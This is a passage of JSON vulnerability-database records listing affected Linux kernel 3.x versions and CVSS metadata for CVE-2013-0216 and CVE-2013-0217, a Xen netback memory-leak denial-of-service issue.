"cpe:/o:linux:linux_kernel:3.4.2", "cpe:/o:linux:linux_kernel:3.4.13", "cpe:/o:linux:linux_kernel:3.2.29", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.6.10", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.2.23", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.7.3", "cpe:/o:linux:linux_kernel:3.7.8", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.2.30", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.4.9", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.4.24", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.2.27", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.0.44", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:3.4.6", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.5.1", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.2.28", "cpe:/o:linux:linux_kernel:3.3.4", "cpe:/o:linux:linux_kernel:3.3.7", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.7.2", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:3.7.5", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.4.3", "cpe:/o:linux:linux_kernel:3.3.2", "cpe:/o:linux:linux_kernel:3.4.20", "cpe:/o:linux:linux_kernel:3.3.3", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:3.7.7", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:3.2.2", "cpe:/o:linux:linux_kernel:3.7.6", "cpe:/o:linux:linux_kernel:3.5.6", "cpe:/o:linux:linux_kernel:3.4.22", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.4", "cpe:/o:linux:linux_kernel:3.4.17", "cpe:/o:linux:linux_kernel:3.6.9", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.0", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:3.3.8", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.4.15", "cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:3.4.18", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:3.2.21", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.4.8", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:3.5.7", "cpe:/o:linux:linux_kernel:3.2.22", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.0.42", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.4.7", "cpe:/o:linux:linux_kernel:3.5.4", "cpe:/o:linux:linux_kernel:3.3.5", "cpe:/o:linux:linux_kernel:3.5.3", "cpe:/o:linux:linux_kernel:3.4.14", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.7.4", "cpe:/o:linux:linux_kernel:3.5.2", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:3.4.16", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.6.11", "cpe:/o:linux:linux_kernel:3.4.12", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.7.1", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:3.3.1", "cpe:/o:linux:linux_kernel:3.2.26", "cpe:/o:linux:linux_kernel:3.4.5", "cpe:/o:linux:linux_kernel:3.4.1", "cpe:/o:linux:linux_kernel:3.2.10", "cpe:/o:linux:linux_kernel:3.4.11"], "id": "CVE-2013-0216", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0216", "cvss": {"score": 5.2, "vector": "AV:A/AC:M/Au:S/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.39:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.43:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.44:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.42:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.40:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.41:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.38:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc7:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:52:35", "description": "Memory leak in drivers/net/xen-netback/netback.c in the Xen netback functionality in the Linux kernel before 3.7.8 allows guest OS users to cause a denial of service (memory consumption) by triggering certain error conditions.", "edition": 5, "cvss3": {}, "published": "2013-02-18T04:41:00", "title": "CVE-2013-0217", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 5.2, "vectorString": "AV:A/AC:M/Au:S/C:N/I:N/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0217"], "modified": "2013-08-22T06:48:00", "cpe": ["cpe:/o:linux:linux_kernel:3.7", "cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:3.4.4", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.4.10", "cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:3.4.19", "cpe:/o:linux:linux_kernel:3.4.21", "cpe:/o:linux:linux_kernel:3.2.24", "cpe:/o:linux:linux_kernel:3.2.25", "cpe:/o:linux:linux_kernel:3.5.5", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.3.6", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.4.23", "cpe:/o:linux:linux_kernel:3.4.2", "cpe:/o:linux:linux_kernel:3.4.13", "cpe:/o:linux:linux_kernel:3.2.29", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.6.10", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.2.23", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.7.3", "cpe:/o:linux:linux_kernel:3.7.8", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.2.30", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.4.9", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.4.24", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.2.27", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.0.44", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:3.4.6", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.5.1", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.2.28", "cpe:/o:linux:linux_kernel:3.3.4", "cpe:/o:linux:linux_kernel:3.3.7", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.7.2", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:3.7.5", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.4.3", "cpe:/o:linux:linux_kernel:3.3.2", "cpe:/o:linux:linux_kernel:3.4.20", "cpe:/o:linux:linux_kernel:3.3.3", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:3.7.7", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:3.2.2", "cpe:/o:linux:linux_kernel:3.7.6", "cpe:/o:linux:linux_kernel:3.5.6", "cpe:/o:linux:linux_kernel:3.4.22", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.4", "cpe:/o:linux:linux_kernel:3.4.17", "cpe:/o:linux:linux_kernel:3.6.9", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.0", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:3.3.8", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.4.15", "cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:3.4.18", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:3.2.21", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.4.8", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:3.5.7", "cpe:/o:linux:linux_kernel:3.2.22", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.0.42", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.4.7", "cpe:/o:linux:linux_kernel:3.5.4", "cpe:/o:linux:linux_kernel:3.3.5", "cpe:/o:linux:linux_kernel:3.5.3", "cpe:/o:linux:linux_kernel:3.4.14", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.7.4", "cpe:/o:linux:linux_kernel:3.5.2", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:3.4.16", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.6.11", "cpe:/o:linux:linux_kernel:3.4.12", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.7.1", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:3.3.1", "cpe:/o:linux:linux_kernel:3.2.26", "cpe:/o:linux:linux_kernel:3.4.5", "cpe:/o:linux:linux_kernel:3.4.1", "cpe:/o:linux:linux_kernel:3.2.10", "cpe:/o:linux:linux_kernel:3.4.11"], "id": "CVE-2013-0217", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0217", "cvss": {"score": 5.2, "vector": "AV:A/AC:M/Au:S/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.39:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.43:*:*:*:*:*:*:*", 